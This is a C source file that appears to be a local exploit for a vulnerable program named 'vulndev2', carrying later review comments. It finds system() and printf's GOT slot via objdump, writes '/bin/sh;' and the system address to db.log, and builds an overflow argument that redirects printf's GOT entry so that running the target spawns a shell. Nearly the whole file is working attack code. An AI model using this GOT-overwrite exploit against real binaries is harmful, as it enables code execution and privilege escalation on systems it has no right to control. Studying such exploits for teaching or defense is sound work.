#include
#include
#include
#include
#include
/* Resolved address of system() in the target's libc, filled in by main(). */
unsigned long systemaddr;
/* GOT slot address of printf in VULN, as reported by get_gotaddr(). */
unsigned long printf_got;
extern char **environ;
#define BFSIZE 90
/* Command string written to ./db.log; the trailing ';' terminates the shell statement. */
#define CMDSTRING "/bin/sh;"
/* Name of the binary executed by main(); resolved relative to the current directory. */
#define VULN "vulndev2"
/* Payload buffer; charbuffer is a byte-wise alias of the same storage (see main()). */
long buffer[BFSIZE + 4 + 1];
char *charbuffer =(char *) buffer;
/* Second argv entry handed to VULN; filled word by word in main(). */
long argv_1[BFSIZE / 4 + 5];
/* Length of CMDSTRING including its NUL, computed in main(); used as the write offset. */
int padding;
/*
 * Restore the default disposition for SIGCHLD.
 *
 * Installs SIG_DFL with no flags and a mask containing only SIGCHLD,
 * so that a later wait() in the parent can collect the child's status.
 *
 * Returns 0 unconditionally; the sigaction() result is not checked.
 */
int remove_chld_signal()
{
    struct sigaction dfl = {
        .sa_handler = SIG_DFL,
        .sa_flags = 0,
    };

    /* Build the handler mask explicitly: empty, then SIGCHLD only. */
    sigemptyset(&dfl.sa_mask);
    sigaddset(&dfl.sa_mask, SIGCHLD);

    sigaction(SIGCHLD, &dfl, NULL);
    return 0;
}
/*
 * Minimal popen(3) replacement: run `command` via /bin/sh -c with its
 * stdout connected to a pipe.
 *
 * @param command  shell command line passed verbatim to /bin/sh -c.
 * @return the read end of the pipe in the parent; -1 in the child if
 *         execve() fails. The child's exit status is left for the caller
 *         to reap (see remove_chld_signal()/wait()).
 *
 * Neither pipe() nor fork() results are checked; a failed fork() takes
 * the parent path and returns the read end regardless.
 */
int my_popen(char *command)
{
    char *shell_argv[] = { "/bin/sh", "-c", command, NULL };
    int fds[2];

    pipe(fds);
    int child = fork();

    if (child != 0) {
        /* parent: drop the write end, hand back the read end */
        close(fds[1]);
        return fds[0];
    }

    /* child: stdin side of the pipe is unused, stdout goes into the pipe */
    close(fds[0]);
    dup2(fds[1], 1);
    execve("/bin/sh", shell_argv, environ);
    fprintf(stderr, "Something went wrong with the execve\n");
    return -1;
}
/*
 * Look up the GOT slot address of `symbol` in ELF `file` by parsing the
 * output of `objdump -R`.
 *
 * @param file    path of the binary to inspect; interpolated unquoted into
 *                a shell command line, so it must be a trusted constant
 *                (the only call site in this file passes VULN).
 * @param symbol  relocation symbol name, also interpolated unquoted.
 * @return the parsed address, 0 on a short read, -1 if the pipe could not
 *         be obtained.
 *
 * NOTE(review): `buffer` is reused for both the command line and the
 * objdump output and is not NUL-terminated after read(); strtoul() may
 * scan past the bytes actually read. The second argument to strtoul()
 * is `char **endptr`, but strchr() yields a `char *` — the types do not
 * match. On the short-read path the pipe fd is not closed and the child
 * is not reaped.
 */
long get_gotaddr(char *file, char *symbol)
{
int fd;
long got;
char buffer[256];
snprintf(buffer, 256, "objdump -R %s | grep -w %s | sort | tail -n 1",
file, symbol);
/* Reset SIGCHLD so the wait() below can collect the child. */
remove_chld_signal();
fd = my_popen(buffer);
if (fd <= 0)
return -1;
/* The objdump line overwrites the command string in the same buffer. */
if (read(fd, buffer, 256) <= 0) {
printf("short read\n");
return 0;
}
close(fd);
wait(NULL);
/* Parses the leading hex field of the objdump -R line (address column). */
got = strtoul(buffer, strchr(buffer, ' '), 16);
return got;
}
/*
 * Entry point.
 *
 * argv[1], if present, overrides local_var_pad (the number of extra words
 * appended to argv_1). Builds a payload in charbuffer, writes it to
 * ./db.log, fills argv_1, and finally replaces this process with VULN via
 * execve(); the trailing printf() is reached only if execve() fails.
 *
 * NOTE(review): several results are unchecked here — open() may return -1
 * (the write/fchmod/close would then operate on an invalid fd), write()
 * may be short, and atoi() silently yields 0 for a non-numeric argv[1].
 */
int main(int argc, char **argv)
{
int i;
int local_var_pad = 5; /* five works at home :) */
int max;
int fd;
unsigned long *target;
/* argv handed to VULN: argv[1] is the raw word array argv_1. */
char *args[] ={VULN,(char *)argv_1,"0wn3d",NULL};
if (argc > 1)
local_var_pad = atoi(argv[1]);
/* getting system addr, updating it and writing stuff into db.log */
system(""); /* Make the got of system updated */
/* Reads a pointer stored 2 bytes into the PLT stub of system(); this
 * assumes a specific (32-bit x86, non-PIC) stub layout — not checked. */
systemaddr = **(unsigned long **) ((char *) system + 2);
systemaddr++; /* skip the push %ebp instruction */
/* CMDSTRING is a fixed 8-byte literal; buffer is far larger, so this
 * strcpy cannot overrun. */
strcpy(charbuffer, CMDSTRING);
printf("Using system address 0x%.8lx\n",systemaddr);
padding = strlen(charbuffer) + 1; /* don't forget a null */
printf_got = get_gotaddr(VULN, "printf");
/* Store systemaddr immediately after the NUL of CMDSTRING; `target` is
 * an unsigned long * into a char array, so this word is unaligned. */
target = (unsigned long *) (charbuffer + padding);
*target = systemaddr;
charbuffer[padding+4]='\n';
charbuffer[padding+5]=0;
/* NOTE(review): O_CREAT without a mode argument leaves the initial file
 * mode indeterminate; the fchmod() below then forces it to 0777. The
 * returned fd is not checked. */
fd=open("./db.log",O_CREAT|O_WRONLY);
write(fd,charbuffer,padding+5);
fchmod(fd,0777);
close(fd);
printf("And overwriting printf got at 0x%.8lx starting by 0x%.8lx\n",
printf_got,printf_got-padding);
printf_got -= padding;
/* argv_1: max filler words, then printf_got, then 0xf00. max depends on
 * local_var_pad, so an out-of-range argv[1] can index past argv_1's
 * BFSIZE/4 + 5 entries — no bounds check. */
max=BFSIZE/4 + local_var_pad;
for (i = 0; i < max; i ++)
argv_1[i] = 0xbadc0de;
argv_1[i++] = printf_got;
argv_1[i++] = 0xf00;
execve(VULN, args, environ);
/* Only reached when execve() fails; errno is not reported. */
printf("It fucked\n");
return 0;
}